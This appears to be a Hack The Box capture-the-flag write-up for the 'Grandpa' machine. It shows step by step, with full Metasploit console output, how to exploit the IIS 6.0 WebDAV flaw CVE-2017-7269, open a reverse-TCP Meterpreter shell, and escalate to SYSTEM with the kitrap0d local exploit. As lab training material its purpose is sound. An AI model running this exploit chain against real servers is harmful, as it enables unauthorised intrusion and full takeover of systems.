___ ___ _________ ________
|\ \|\ \|\___ ___\\ __ \ ___
\ \ \\\ \|___ \ \_\ \ \|\ /_|\__\
\ \ __ \ \ \ \ \ \ __ \|__|
\ \ \ \ \ \ \ \ \ \ \|\ \ ___
\ \__\ \__\ \ \__\ \ \_______\|\__\
\|__|\|__| \|__| \|_______|\|__|
________ ________ ________ ________ ________
|\ ____\|\ __ \|\ __ \|\ ___ \|\ ___ \
\ \ \___|\ \ \|\ \ \ \|\ \ \ \\ \ \ \ \_|\ \ ____________
\ \ \ __\ \ _ _\ \ __ \ \ \\ \ \ \ \ \\ \|\____________\
\ \ \|\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \_\\ \|____________|
\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
________ ________
|\ __ \|\ __ \
\ \ \|\ \ \ \|\ \
\ \ ____\ \ __ \
\ \ \___|\ \ \ \ \
\ \__\ \ \__\ \__\
\|__| \|__|\|__|
Hack The Box's Grandpa is an Easy Windows machine with an open service of Microsoft IIS version 6.0 which has a remote command execution vulnerability (CVE-2017-7269). This machine uses basic enumeration using Nmap, easy to obtain exploits that are available as Metasploit modules, and some basic privilege escalation.
Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
ping 10.129.95.233
You should receive responses from
the IP address. You can press CTRL + C to stop sending packets to the
target host. Once confirming the network is up and running, it's time to
move to enumeration using Nmap.
Start by doing a quick service
scan using Nmap. We will use the -sV switch to enable version detection.
You can learn more about Nmap here.
nmap -sV 10.129.95.233 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:04 CDT Nmap scan report for 10.129.95.233 Host is up (0.076s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.27 seconds
On port 80 we see an open service of Microsoft IIS version 6.0 running. After some searching on the web we find that this service has a remote command execution vulnerability, CVE-2017-7269. Let's fire-up Metasploit and search for potential exploits:
msfconsole Metasploit tip: Open an interactive Ruby terminal with irb ______________________________________ / it looks like you're trying to run a \ \ module / -------------------------------------- \ \ __ / \ | | @ @ | | || |/ || || |\_/| \___/ =[ metasploit v6.4.43-dev ] + -- --=[ 2483 exploits - 1279 auxiliary - 393 post ] + -- --=[ 1463 payloads - 49 encoders - 13 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ [msf](Jobs:0 Agents:0) >> search CVE-2017-7269 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl [msf](Jobs:0 Agents:0) >>
We see option #0 which is a buffer overflow vulnerability in the ScStoragePathFromUrl function within the IIS 6.0 WebDAV service. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:
[msf](Jobs:0 Agents:0) >> use 0 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp [msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> options Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl): Name Current Setting Required Description ---- --------------- -------- ----------- MAXPATHLENGTH 60 yes End of physical path brute force MINPATHLENGTH 3 yes Start of physical path brute forc e Proxies no A proxy chain of format type:host :port[,type:host:port][...] RHOSTS yes The target host(s), see https://d ocs.metasploit.com/docs/using-met asploit/basics/using-metasploit.h tml RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing co nnections TARGETURI / yes Path of IIS 6 web application VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thr ead, process, none) LHOST 85.9.199.172 yes The listen address (an interface may b e specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Microsoft Windows Server 2003 R2 SP2 x86 View the full module info with the info, or info -d command. [msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> set RHOSTS 10.129.95.233 RHOSTS => 10.129.95.233 [msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> set LHOST 10.10.14.241 LHOST => 10.10.14.241 [msf](Jobs:0 Agents:0)
We set the RHOSTS to the target ip address and the LHOST to our desired listening ip address for the reverse TCP connection. We can now run this exploit:
[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> exploit [*] Started reverse TCP handler on 10.10.14.241:4444 [*] Trying path length 3 to 60 ... [*] Sending stage (177734 bytes) to 10.129.95.233 [*] Meterpreter session 1 opened (10.10.14.241:4444 -> 10.129.95.233:1030) at 2025-07-15 15:10:26 -0500 (Meterpreter 1)(c:\windows\system32\inetsrv) >
We now have user access to the target machine. After some digging on the system we find we need administrator access in order to get the user .txt flag. We will need to do some privilege escalation. Let's first migrate to a stable process using NT AUTHORITY\NETWORK
SERVICE. After listing the current services, let's switch to the davcdata.exe process using the migrate command.
(Meterpreter 1)(c:\windows\system32\inetsrv) > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Pro cess] 4 0 System 272 4 smss.exe 320 272 csrss.exe 344 272 winlogon.ex e 392 344 services.ex e 404 344 lsass.exe 580 392 svchost.exe 668 392 svchost.exe 732 392 svchost.exe 776 392 svchost.exe 796 392 svchost.exe 944 392 spoolsv.exe 972 392 msdtc.exe 1092 392 cisvc.exe 1136 392 svchost.exe 1192 392 inetinfo.ex e 1228 392 svchost.exe 1368 392 VGAuthServi ce.exe 1420 392 vmtoolsd.ex e 1508 392 svchost.exe 1608 392 svchost.exe 1836 392 alg.exe 1872 392 dllhost.exe 1892 580 wmiprvse.ex x86 0 NT AUTHORITY\NETW C:\WINDOWS\system3 e ORK SERVICE 2\wbem\wmiprvse.ex e 2420 580 wmiprvse.ex e 3620 1508 w3wp.exe x86 0 NT AUTHORITY\NETW c:\windows\system3 ORK SERVICE 2\inetsrv\w3wp.exe 3692 580 davcdata.ex x86 0 NT AUTHORITY\NETW C:\WINDOWS\system3 e ORK SERVICE 2\inetsrv\davcdata .exe 3812 3620 rundll32.ex x86 0 C:\WINDOWS\system3 e 2\rundll32.exe (Meterpreter 1)(c:\windows\system32\inetsrv) > migrate 3692 [*] Migrating from 3812 to 3692... [*] Migration completed successfully. (Meterpreter 1)(C:\WINDOWS\system32) >
After migrating, we can background this session using the background command and search for an exploit for our target system using local_exploit_suggester:
(Meterpreter 1)(C:\WINDOWS\system32) > background [*] Backgrounding session 1... [msf](Jobs:0 Agents:1) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> use post/multi/recon/local_exploit_suggester [msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits View the full module info with the info, or info -d command. [msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set SESSION 1 SESSION => 1 [msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run [*] 10.129.95.233 - Collecting local exploits for x86/windows... [*] 10.129.95.233 - 202 exploit checks are being tried... [+] 10.129.95.233 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.129.95.233 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.129.95.233 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.129.95.233 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.129.95.233 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.129.95.233 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.129.95.233 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Running check method for exploit 42 / 42 [*] 10.129.95.233 - Valid modules for session 1: ============================ # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated. 2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable. 3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable. 4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable. 5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated. 6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable. 7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable. 8 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability. 9 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable. 10 exploit/windows/local/always_install_elevated No The target is not exploitable. 11 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system 12 exploit/windows/local/bits_ntlm_token_impersonation No The check raised an exception. 13 exploit/windows/local/bthpan No The target is not exploitable. 14 exploit/windows/local/bypassuac_comhijack No The target is not exploitable. 15 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable. 16 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable. 17 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable. 18 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found 19 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows! 20 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable. 21 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable. 22 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found 23 exploit/windows/local/ikeext_service No The check raised an exception. 24 exploit/windows/local/ipass_launch_app No The check raised an exception. 25 exploit/windows/local/lenovo_systemupdate No The check raised an exception. 26 exploit/windows/local/lexmark_driver_privesc No The check raised an exception. 27 exploit/windows/local/mqac_write No The target is not exploitable. 28 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2003 (5.2 Build 3790, Service Pack 2). is not vulnerable 29 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable. 30 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability. 31 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable. 32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception. 33 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable. 34 exploit/windows/local/ms_ndproxy No The target is not exploitable. 35 exploit/windows/local/novell_client_nicm No The target is not exploitable. 36 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception. 37 exploit/windows/local/ntusermndragover No The target is not exploitable. 38 exploit/windows/local/panda_psevents No The target is not exploitable. 39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found 40 exploit/windows/local/tokenmagic No The target is not exploitable. 41 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable. 42 exploit/windows/local/webexec No The check raised an exception. [*] Post module execution completed [msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >>
We will receive a list of potential exploits for our target system. We will be using option 1, ms10_015_kitrap0d. You can read more about this privilege escalation exploit here. Lets use this exploit, set our options and run:
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/ms10_015_kitrap0d [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp [msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 194.113.72.151 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) View the full module info with the info, or info -d command. [msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> set SESSION 1 SESSION => 1 [msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> set LHOST 10.10.14.241 LHOST => 10.10.14.241 [msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> exploit [*] Started reverse TCP handler on 10.10.14.241:4444 [*] Reflectively injecting payload and triggering the bug... [*] Launching netsh to host the DLL... [+] Process 3292 launched. [*] Reflectively injecting the DLL into 3292... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (177734 bytes) to 10.129.95.233 [*] Meterpreter session 2 opened (10.10.14.241:4444 -> 10.129.95.233:1031) at 2025-07-16 10:56:22 -0500 (Meterpreter 2)(C:\WINDOWS\system32) >
It looks like the exploit was successful. Let's run getuid and see who we are:
(Meterpreter 2)(C:\WINDOWS\system32) > getuid Server username: NT AUTHORITY\SYSTEM
You can now navigate through the target system as an administrator to obtain the root and user .txt flag.